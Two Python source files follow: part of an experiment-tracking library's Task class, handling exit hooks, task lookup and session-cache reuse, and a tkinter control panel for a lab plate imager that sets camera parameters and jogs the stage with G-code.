self._orig_exc_handler = None
for h in self._org_handlers:
# noinspection PyBroadException
try:
signal.signal(h, self._org_handlers[h])
except Exception:
pass
self._org_handlers = {}
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
if self._exit_callback:
atexit.register(self._exit_callback)
# TODO: check if sub-process hooks are safe enough, for the time being allow it
if not self._org_handlers: # ## and not Task._Task__is_subprocess():
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for c in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[c] = signal.getsignal(c)
signal.signal(c, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
# noinspection PyArgumentList
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
# noinspection PyArgumentList
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
# noinspection PyNoneFunctionAssignment, PyArgumentList
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
if self._signal_recursion_protection_flag:
# call original
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
org_handler = org_handler(sig, frame)
return org_handler
self._signal_recursion_protection_flag = True
# call exit callback
self.signal = sig
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# call original signal handler
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
# noinspection PyBroadException
try:
org_handler = org_handler(sig, frame)
except Exception:
org_handler = signal.SIG_DFL
# remove stdout logger, just in case
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
Logger._remove_std_logger()
except Exception:
pass
self._signal_recursion_protection_flag = False
# return handler result
return org_handler
# we only remove the signals since this will hang subprocesses
if only_remove_signal_and_exception_hooks:
if not cls.__exit_hook:
return
if cls.__exit_hook._orig_exc_handler:
sys.excepthook = cls.__exit_hook._orig_exc_handler
cls.__exit_hook._orig_exc_handler = None
for s in cls.__exit_hook._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, cls.__exit_hook._org_handlers[s])
except Exception:
pass
cls.__exit_hook._org_handlers = {}
return
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
else:
cls.__exit_hook.update_callback(exit_callback)
@classmethod
def __get_task(cls, task_id=None, project_name=None, task_name=None):
if task_id:
return cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
project=[project.id] if project else None,
name=exact_match_regex(task_name) if task_name else None,
only_fields=['id', 'name', 'last_update', system_tags]
)
)
res_tasks = res.response.tasks
# if we have more than one result, first filter 'archived' results:
if len(res_tasks) > 1:
filtered_tasks = [t for t in res_tasks if not getattr(t, system_tags, None) or
'archived' not in getattr(t, system_tags, None)]
if filtered_tasks:
res_tasks = filtered_tasks
task = get_single_result(entity='task', query=task_name, results=res_tasks, raise_on_error=False)
if not task:
return None
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if task_ids:
if isinstance(task_ids, six.string_types):
task_ids = [task_ids]
return [cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
for task_id in task_ids]
return [cls(private=cls.__create_protection, task_id=task.id, log_to_backend=False)
for task in cls._query_tasks(project_name=project_name, task_name=task_name, **kwargs)]
@classmethod
def _query_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if not task_ids:
task_ids = None
elif isinstance(task_ids, six.string_types):
task_ids = [task_ids]
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
only_fields = ['id', 'name', 'last_update', system_tags]
if kwargs and kwargs.get('only_fields'):
only_fields = list(set(kwargs.pop('only_fields')) | set(only_fields))
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
id=task_ids,
project=[project.id] if project else kwargs.pop('project', None),
name=task_name if task_name else None,
only_fields=only_fields,
**kwargs
)
)
return res.response.tasks
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# The task may no longer exist (e.g., the environment/server changed)
if not all_tasks:
return None
return all_tasks[0]
@classmethod
def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
1. It is not timed out, i.e., it was last used within the previous 24 hours.
2. Its name, project, and type match the data on the server, so we do not
override user changes made via the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True, if the task is relevant for reuse. False, if not.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
if task is None:
return False
project_name = None
if task.project:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
if task_data.get('type') and \
task_data.get('type') not in (cls.TaskTypes.training, cls.TaskTypes.testing) and \
not Session.check_min_api_version(2.8):
print('WARNING: Changing task type to "{}" : '
'trains-server does not support task type "{}", '
'please upgrade trains-server.'.format(cls.TaskTypes.training, task_data['type'].value))
task_data['type'] = cls.TaskTypes.training
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(six.text_type(server_data) == six.text_type(task_data.get(task_data_key))
for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
str(tasks.TaskStatusEnum.stopped),
str(tasks.TaskStatusEnum.published),
str(tasks.TaskStatusEnum.publishing),
str(tasks.TaskStatusEnum.closed),
str(tasks.TaskStatusEnum.failed),
str(tasks.TaskStatusEnum.completed),
)
if str(task.status) not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
|
manual_frame.py
|
import tkinter as tk
from tkinter import ttk
import threading
import time
from PIL import Image, ImageTk
import sys
import gcodesender as gc
import os
# Constants that determine how far along each axis the imager will attempt to move. Should be set lower
# than the actual movement range, and should be adjusted each time the stop screws are changed.
maxX = 115
maxY = 125
maxZ = 100
class ManualFrame(tk.Frame):
"""Defines a tk.Frame containing all the widgets used in manual mode"""
def __init__(self, master):
"""Initializes all the widgets for the manual mode GUI"""
self.live = 0
self.x = 0
self.y = 0
self.z = 0
self.app = master.master
self.app.loading_screen.label.config(text="Creating Manual Frame...")
self.app.loading_screen.update()
#go_home(app_master.s)
time.sleep(2)
#set_height(self.s)
screen_width = self.app.screen_width
screen_height = self.app.screen_height
tk.Frame.__init__(self, master)
# Button Frame is the full height and 1/2 the width of the screen
# located in the bottom left corner
# Contains the plate selector, well selector, 'custom path' button,
# and 'GO' button
self.button_frame = tk.Frame(self, height=(screen_height), width=screen_width / 2, bg="#fff")
self.button_frame.grid_propagate(0)
self.button_frame.grid(row=3, column=0, rowspan=6, sticky=tk.SW)
# Video Frame is 6/9 the height and 1/2 the width of the screen
# located in the top right corner
# Contains live feed video as the imager works
self.video_height = (screen_height/9) * 6
self.video_width = (screen_width/2)
self.video_frame = tk.Frame(self, height=self.video_height, width=self.video_width, bg= "#111")
self.video_frame.grid_propagate(0)
self.video_frame.grid(row = 0, column = 1, rowspan = 7, sticky=tk.NE)
# Feedback frame is 3/9 the height and 1/2 the width of the screen
# located in the bottom right corner
# Contains the progress bar, 'Cancel' button, and output window
self.feedback_frame = tk.Frame(self, height=(screen_height/9)*3, width=screen_width/2, bg='#222')
self.feedback_frame.grid_propagate(0)
self.feedback_frame.grid(row = 7, column = 1, rowspan = 3, sticky=tk.SE)
self.progress_frame = tk.Frame(self.feedback_frame, height=self.feedback_frame.winfo_height(), width=(self.feedback_frame.winfo_width()/2), bg='#222')
self.progress_frame.grid_propagate(0)
self.progress_frame.grid(row=0, column=0, sticky=tk.W)
#---------------------------------------------------------------------------------------------------------------
xPad = screen_width/86
yPad = ((screen_height/9)*6)/126
style = ttk.Style()
style.configure("TButton", font=("Sans", "12"))
style.configure("Bold.TButton", font=("Sans", "12", "bold"), width=3)
style.configure("Italic.TButton", font=("Sans", "12", "bold"), width=4)
style.configure("TLabel", font=("Sans", "14"), background="#eeeeee")
style.configure("Bold.TLabel", relief="raised", borderwidth=5)
style.configure("TCombobox", font=("Sans", "14"))
style.configure("TCheckbutton", background="#eeeeee")
style.configure("TEntry", font=("Sans", "14"), height="14")
style.configure("TRadiobutton", font=("Sans", "12"), background="#eeeeee")
for i in range(28):
ttk.Label(self.button_frame, text="", background="white").grid(row=i, column=0, ipady=yPad, ipadx=xPad)
#ttk.Label(self.button_frame, text="", background="red").grid(row=i, column=19, ipady=yPad, ipadx=xPad)
for i in range(20):
ttk.Label(self.button_frame, text="", background="white").grid(row=0, column=i, ipady=yPad, ipadx=xPad)
#ttk.Label(self.button_frame, text="", background="red").grid(row=27, column=i, ipady=yPad, ipadx=xPad)
# Creates the background labels
plate_background = ttk.Label(self.button_frame, text= "", style="Bold.TLabel")
plate_background.grid(row=1, column=1, rowspan=5, columnspan=9, sticky=tk.N + tk.S + tk.E + tk.W)
settings_background = ttk.Label(self.button_frame, text="", style="Bold.TLabel")
settings_background.grid(row=1, column=11, rowspan=5, columnspan=8, sticky=tk.N + tk.S + tk.E + tk.W)
control_background = ttk.Label(self.button_frame, text="", style="Bold.TLabel")
control_background.grid(row=7, column=1, rowspan=19, columnspan=18, sticky=tk.N + tk.S + tk.E + tk.W)
# Creates the widgets for the frame
self.project = self.app.frames["AutoFrame"].project
self.project_entry = ttk.Entry(self.button_frame, textvariable=self.project, font=("Sans", "12"))
entry_label = ttk.Label(self.button_frame, text="*Project code: ")
entry_label.grid(row=21, column=9, columnspan=5, sticky=tk.E)
self.project_entry.grid(row=21, column=14, columnspan=6, sticky=tk.W)
self.target = self.app.frames["AutoFrame"].target
self.target_entry = ttk.Entry(self.button_frame, textvariable=self.target, font=("Sans", "12"))
target_label = ttk.Label(self.button_frame, text="*Target name: ")
target_label.grid(row=22, column=9, columnspan=5, sticky=tk.E)
self.target_entry.grid(row=22, column=14, columnspan=6, sticky=tk.W)
self.plate = self.app.frames["AutoFrame"].plate
self.plate_entry = ttk.Entry(self.button_frame, textvariable=self.plate, font=("Sans", "12"))
plate_label = ttk.Label(self.button_frame, text="*Plate name: ")
plate_label.grid(row=23, column=9, columnspan=5, sticky=tk.E)
self.plate_entry.grid(row=23, column=14, columnspan=6, sticky=tk.W)
self.date = self.app.frames["AutoFrame"].date
self.date_entry = ttk.Entry(self.button_frame, textvariable=self.date, font=("Sans", "12"))
date_label = ttk.Label(self.button_frame, text="*Prep date: ")
date_label.grid(row=24, column=9, columnspan=5, sticky=tk.E)
self.date_entry.grid(row=24, column=14, columnspan=6, sticky=tk.W)
warning_label = ttk.Label(self.button_frame, text= "(Must be 'yyyy-mm-dd' format)", font=("Sans", "12", "italic"))
warning_label.grid(row=25, column=10, columnspan=11, sticky=tk.N)
# Create the tray dropdown list and label
choices = ['Intelli-plate 96-3', 'Greiner 1536']
self.dropdown = ttk.Combobox(self.button_frame, textvariable=self.app.type, values=choices, state="readonly",
font=("Sans", "16"))
self.dropdown.bind("<<ComboboxSelected>>", self.app.frames["AutoFrame"].on_field_change)
ttk.Label(self.button_frame, text='Plate selection', font=("Sans", "14", "bold")).grid(row=1, column=3, columnspan=5)
self.dropdown.grid(row=2, column=1, columnspan=9, rowspan=2)
def load():
self.app.imager.load_tray()
self.app.open_plate_window()
self.load_button = ttk.Button(self.button_frame, text="Load new plate", command=load)
self.load_button.grid(row=4, column=2, columnspan=3)
def save():
threading.Thread(target=self.app.save_image, args=()).start()
self.camera_button = ttk.Button(self.button_frame, text="Save current image", command=save)
self.camera_button.grid(row = 8, column = 11, columnspan=9)
ttk.Label(self.button_frame, text="Settings", font=("Sans", "14", "bold")).grid(row=1, column=11, columnspan=8)
choices = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
slices = ttk.Combobox(self.button_frame, textvariable=self.app.slices, values=choices, state="readonly", width=3)
slices.grid(row=4, column=17, rowspan=2)
slice_label = ttk.Label(self.button_frame, text="Slices: ")
slice_label.grid(row=4, column=14, rowspan=2, columnspan=3, sticky=tk.E)
lightsVar = tk.IntVar(master)
self.lights_on_button = ttk.Radiobutton(self.button_frame, text="On", variable=lightsVar, value=1, command=self.app.arduino.lights_on)
self.lights_on_button.grid(row=2, column=13, sticky=tk.S)
self.lights_off_button = ttk.Radiobutton(self.button_frame, text="Off", variable=lightsVar, value=0, command=self.app.arduino.lights_off)
self.lights_off_button.grid(row=3, column=13, sticky=tk.N)
lights_label = ttk.Label(self.button_frame, text="Lights:")
lights_label.grid(row=2, column=11, rowspan =2, columnspan=2, sticky=tk.E)
#lightsVar.set(1) # Begin with lights on
filterVar = tk.IntVar(master)
self.green_filter_button = ttk.Radiobutton(self.button_frame, text="Green", variable=filterVar, value=1, command=self.app.arduino.servo_0) #servo_0
self.green_filter_button.grid(row=2, column=17, columnspan=2, sticky=tk.S + tk.W)
self.no_filter_button = ttk.Radiobutton(self.button_frame, text="None", variable=filterVar, value=0, command=self.app.arduino.servo_90) #servo_90
self.no_filter_button.grid(row=3, column=17, columnspan=2, sticky=tk.N + tk.W)
filter_label = ttk.Label(self.button_frame, text="Filter:")
filter_label.grid(row=2, column=14, rowspan=2, columnspan=3, sticky=tk.E)
filterVar.set(0)
laserVar = tk.IntVar(master)
self.laser_on_button = ttk.Radiobutton(self.button_frame, text="On", variable=laserVar, value=1, command=self.app.arduino.laser_on)
self.laser_on_button.grid(row=4, column=13, sticky=tk.S)
self.laser_off_button = ttk.Radiobutton(self.button_frame, text="Off", variable=laserVar, value=0, command=self.app.arduino.laser_off)
self.laser_off_button.grid(row=5, column=13, sticky=tk.N)
laser_label = ttk.Label(self.button_frame, text="Laser:")
laser_label.grid(row=4, column=11, columnspan=2, rowspan=2, sticky=tk.E)
laserVar.set(0)
self.calibrate_button = ttk.Button(self.button_frame, text="Calibrate", command=self.calibrate)
self.calibrate_button.grid(row = 4, column = 6, columnspan=3)
# Sliders for camera Temperature and Tint (don't seem to have any significant effect)
#self.temp_var = tk.StringVar(app_master)
#self.tint_var = tk.StringVar(app_master)
#temp, tint = (app_master.cam.get_temperature_tint())
#self.temp_var.set(temp)
#self.tint_var.set(tint)
#self.temp_entry = ttk.Entry(self.button_frame, textvariable = self.temp_var, width=5, font=("Sans", "12"))
#self.tint_entry = ttk.Entry(self.button_frame, textvariable = self.tint_var, width=5, font=("Sans", "12"))
#self.temp_entry.grid(row=19, column=4, columnspan=2, sticky=tk.W)
#self.tint_entry.grid(row=20, column=4, columnspan=2, sticky=tk.W)
#ttk.Label(self.button_frame, text="Temp: ").grid(row=19, column=1, columnspan=3, sticky=tk.E)
#ttk.Label(self.button_frame, text="Tint: ").grid(row=20, column=1, columnspan=3, sticky=tk.E)
#self.temp_scale = ttk.Scale(self.button_frame, from_=2000, to=15000, command=self.set_Temp)
#self.tint_scale = ttk.Scale(self.button_frame, from_=200, to=2500, command=self.set_Tint)
#self.temp_scale.grid(row=19, column=5, columnspan=3)
#self.tint_scale.grid(row=20, column=5, columnspan=3)
#self.temp_scale.set(int(float(self.temp_var.get())))
#self.tint_scale.set(int(float(self.tint_var.get())))
save_camera_button = ttk.Button(self.button_frame, text="Save camera settings", command=self.app.choose_cam_save_file)
save_camera_button.grid(row=20, column=2, columnspan=4)
load_camera_button = ttk.Button(self.button_frame, text="Load camera settings", command=self.app.choose_cam_load_file)
load_camera_button.grid(row=20, column=6, columnspan=4)
self.hue_var = tk.StringVar(self.app)
self.hue_var.set(self.app.cam.get_hue())
self.hue_entry = ttk.Entry(self.button_frame, textvariable = self.hue_var, width=5, font=("Sans", "12"))
self.hue_entry.grid(row = 21, column = 4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Hue: ").grid(row=21, column=1, columnspan=3, sticky=tk.E)
self.hue_scale = ttk.Scale(self.button_frame, from_=-180, to=180, command=self.set_Hue)
self.hue_scale.grid(row=21, column=5, columnspan=3)
self.hue_scale.set(int(float(self.hue_var.get())))
self.saturation_var = tk.StringVar(self.app)
self.saturation_var.set(self.app.cam.get_saturation())
self.saturation_entry = ttk.Entry(self.button_frame, textvariable = self.saturation_var, width=5, font=("Sans", "12"))
self.saturation_entry.grid(row = 22, column = 4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Saturation: ").grid(row=22, column=1, columnspan=3, sticky=tk.E)
self.saturation_scale = ttk.Scale(self.button_frame, from_=0, to=255, command=self.set_Saturation)
self.saturation_scale.grid(row=22, column=5, columnspan=3)
self.saturation_scale.set(int(float(self.saturation_var.get())))
self.brightness_var = tk.StringVar(self.app)
self.brightness_var.set(self.app.cam.get_brightness())
self.brightness_entry = ttk.Entry(self.button_frame, textvariable = self.brightness_var, width=5, font=("Sans", "12"))
self.brightness_entry.grid(row = 23, column = 4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Brightness: ").grid(row=23, column=1, columnspan=3, sticky=tk.E)
self.brightness_scale = ttk.Scale(self.button_frame, from_=-64, to = 64, command=self.set_Brightness)
self.brightness_scale.grid(row=23, column=5, columnspan=3)
self.brightness_scale.set(int(float(self.brightness_var.get())))
self.contrast_var = tk.StringVar(self.app)
self.contrast_var.set(self.app.cam.get_contrast())
self.contrast_entry = ttk.Entry(self.button_frame, textvariable = self.contrast_var, width=5, font=("Sans", "12"))
self.contrast_entry.grid(row=24, column = 4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Contrast: ").grid(row=24, column=1, columnspan=3, sticky=tk.E)
self.contrast_scale = ttk.Scale(self.button_frame, from_=-100, to=100, command = self.set_Contrast)
self.contrast_scale.grid(row=24, column=5, columnspan=3)
self.contrast_scale.set(int(float(self.contrast_var.get())))
self.gamma_var = tk.StringVar(self.app)
self.gamma_var.set(self.app.cam.get_gamma())
self.gamma_entry = ttk.Entry(self.button_frame, textvariable= self.gamma_var, width=5, font=("Sans", "12"))
self.gamma_entry.grid(row=25, column=4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Gamma: ").grid(row=25, column=1, columnspan=3, sticky=tk.E)
self.gamma_scale = ttk.Scale(self.button_frame, from_=20, to=180, command=self.set_Gamma)
self.gamma_scale.grid(row=25, column=5, columnspan=3)
self.gamma_scale.set(int(float(self.gamma_var.get())))
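        # Manual stage-jog controls: arrow images plus X/Y buttons (0.1, 1.0 or
        # one well per click) and Z buttons (0.01, 0.1, 1.0), wired either to
        # the imager's one-well moves or to the x_/y_/z_ helpers below, which
        # emit temporary G-code moves.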
self.quad_image = Image.open("util_images/quad_arrow.png")
        self.quad_image = self.quad_image.resize((int(xPad*6), int(yPad*19)), Image.LANCZOS)  # LANCZOS == the old ANTIALIAS filter
self.quad_image = ImageTk.PhotoImage(self.quad_image)
quad_arrow = ttk.Label(self.button_frame, image=self.quad_image)
quad_arrow.grid(row=13, column=5, rowspan=3, columnspan=3)
self.double_image = Image.open("util_images/double_arrow.png")
        self.double_image = self.double_image.resize((int(xPad*2.5), int(yPad*19)), Image.LANCZOS)  # LANCZOS == the old ANTIALIAS filter
self.double_image = ImageTk.PhotoImage(self.double_image)
double_arrow = ttk.Label(self.button_frame, image=self.double_image)
double_arrow.grid(row=13, column=14, rowspan=3, columnspan=2)
self.x_plus_10_button = ttk.Button(self.button_frame, text="1 well", command=self.app.imager.right_one_well, style="Bold.TButton")
self.x_plus_10_button.grid(row=14, column=10, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_plus_1_button = ttk.Button(self.button_frame, text="1.0", command=self.x_plus_1, style="Bold.TButton")
self.x_plus_1_button.grid(row=14, column=9, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_plus_01_button = ttk.Button(self.button_frame, text="0.1", command=self.x_plus_01, style="Bold.TButton")
self.x_plus_01_button.grid(row=14, column=8, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_minus_01_button = ttk.Button(self.button_frame, text="0.1", command=self.x_minus_01, style="Bold.TButton")
self.x_minus_01_button.grid(row=14, column=4, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_minus_1_button = ttk.Button(self.button_frame, text="1.0", command=self.x_minus_1, style="Bold.TButton")
self.x_minus_1_button.grid(row=14, column=3, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_minus_10_button = ttk.Button(self.button_frame, text="1 well", command=self.app.imager.left_one_well, style="Bold.TButton")
self.x_minus_10_button.grid(row=14, column=2, sticky=tk.N + tk.S + tk.E + tk.W)
self.y_plus_10_button = ttk.Button(self.button_frame, text="1 well", command=self.app.imager.up_one_well, style="Bold.TButton")
self.y_plus_10_button.grid(row=10, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_plus_1_button = ttk.Button(self.button_frame, text="1.0", command=self.y_plus_1, style="Bold.TButton")
self.y_plus_1_button.grid(row=11, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_plus_01_button = ttk.Button(self.button_frame, text="0.1", command=self.y_plus_01, style="Bold.TButton")
self.y_plus_01_button.grid(row=12, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_minus_01_button = ttk.Button(self.button_frame, text="0.1", command=self.y_minus_01, style="Bold.TButton")
self.y_minus_01_button.grid(row=16, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_minus_1_button = ttk.Button(self.button_frame, text="1.0", command=self.y_minus_1, style="Bold.TButton")
self.y_minus_1_button.grid(row=17, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_minus_10_button = ttk.Button(self.button_frame, text="1 well", command=self.app.imager.down_one_well, style="Bold.TButton")
self.y_minus_10_button.grid(row=18, column=5, columnspan=3, sticky=tk.N + tk.S)
#z_plus_10_button = ttk.Button(self.button_frame, text="10", command = self.z_plus_10, style="Italic.TButton")
#z_plus_10_button.grid(row = 10, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_plus_1_button = ttk.Button(self.button_frame, text="1.0", command = self.z_plus_1, style="Italic.TButton")
self.z_plus_1_button.grid(row = 10, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_plus_01_button = ttk.Button(self.button_frame, text="0.1", command = self.z_plus_01, style="Italic.TButton")
self.z_plus_01_button.grid(row = 11, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_plus_001_button = ttk.Button(self.button_frame, text="0.01", command = self.z_plus_001, style="Italic.TButton")
self.z_plus_001_button.grid(row = 12, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_minus_001_button = ttk.Button(self.button_frame, text="0.01", command = self.z_minus_001, style="Italic.TButton")
self.z_minus_001_button.grid(row = 16, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_minus_01_button = ttk.Button(self.button_frame, text="0.1", command = self.z_minus_01, style="Italic.TButton")
self.z_minus_01_button.grid(row = 17, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_minus_1_button = ttk.Button(self.button_frame, text="1.0", command = self.z_minus_1, style="Italic.TButton")
self.z_minus_1_button.grid(row = 18, column = 14, columnspan=2, sticky=tk.N + tk.S)
#z_minus_10_button = ttk.Button(self.button_frame, text="10", command = self.z_minus_10, style="Italic.TButton")
#z_minus_10_button.grid(row = 20, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.well = tk.StringVar(master)
self.well.set("H12-3")
self.well_entry = ttk.Entry(self.button_frame, textvariable=self.well, font=("Sans", "12"), width=7)
well_label = ttk.Label(self.button_frame, text="Enter well to view: ")
example_label = ttk.Label(self.button_frame, text="(must be 'A01-1' format)", font=("Sans", "12", "italic"))
self.goButton = ttk.Button(self.button_frame, text="Go to well", command=self.app.imager.find_single_well)
self.goButton.grid(row=8, column=8, columnspan=3, sticky=tk.W)
well_label.grid(row=8, column=1, columnspan=5, sticky=tk.E)
example_label.grid(row=9, column=2, columnspan=10, sticky=tk.N)
self.well_entry.grid(row=8, column=6, columnspan=2)
#---------------------------------------------------------------------------------------------------------------
self.output = tk.Text(self.feedback_frame, background='black', foreground='white', height=15,
font=("Sans", "12"))
# scroll = tk.Scrollbar(self.output, command=self.output.yview)
# scroll.grid(sticky=tk.E)
# self.output.config(yscrollcommand=scroll.set)
#sys.stdout = self.app.StdRedirector([self.output, master.master.frames["AutoFrame"].output])
#sys.stderr = self.app.StdRedirector([self.output, master.master.frames["AutoFrame"].output])
self.output.grid(row=0, column=1, rowspan=2)
self.video_screen = ttk.Label(self.video_frame, text='')
self.video_screen.grid(row=0, column=0)
def find_well(event):
self.app.imager.find_single_well()
self.well_entry.bind("<Return>", find_well)
def set_hue(event):
value = self.hue_var.get()
v = float(value)
v = int(v)
self.hue_scale.set(v)
self.hue_entry.bind("<Return>", set_hue)
def set_saturation(event):
value = self.saturation_var.get()
v = float(value)
v = int(v)
self.saturation_scale.set(v)
self.saturation_entry.bind("<Return>", set_saturation)
def set_brightness(event):
value = self.brightness_var.get()
v = float(value)
v = int(v)
self.brightness_scale.set(v)
self.brightness_entry.bind("<Return>", set_brightness)
def set_contrast(event):
value = self.contrast_var.get()
v = float(value)
v = int(v)
self.contrast_scale.set(v)
self.contrast_entry.bind("<Return>", set_contrast)
def set_gamma(event):
value = self.gamma_var.get()
v = float(value)
v = int(v)
self.gamma_scale.set(v)
self.gamma_entry.bind("<Return>", set_gamma)
# def set_temp(event):
# value = self.temp_var.get()
# v = float(value)
# v = int(v)
# self.temp_scale.set(v)
# self.temp_entry.bind("<Return>", set_temp)
# def set_tint(event):
# value = self.tint_var.get()
# v = float(value)
# v = int(v)
# self.tint_scale.set(v)
# self.tint_entry.bind("<Return>", set_tint)
self.app.loading_screen.progress.step(33)
self.app.loading_screen.update()
    def save_camera_settings(self):
        # NOTE: stub - opens the config file for reading but does not save anything yet
        file = open("camera_config")
def x_plus_10(self):
        currentX, currentY = self.app.imager.ping_location()  # no argument, to match the other jog helpers
if currentX > maxX-10:
return
else:
gc.writeTemporary(currentX+10, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_plus_1(self):
currentX, currentY = self.app.imager.ping_location()
if currentX > maxX-1:
return
else:
gc.writeTemporary(currentX+1, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_plus_01(self):
currentX, currentY = self.app.imager.ping_location()
if currentX > maxX-.1:
return
else:
gc.writeTemporary(currentX+.1, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_minus_10(self):
currentX, currentY = self.app.imager.ping_location()
if currentX < 10:
return
else:
gc.writeTemporary(currentX-10, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
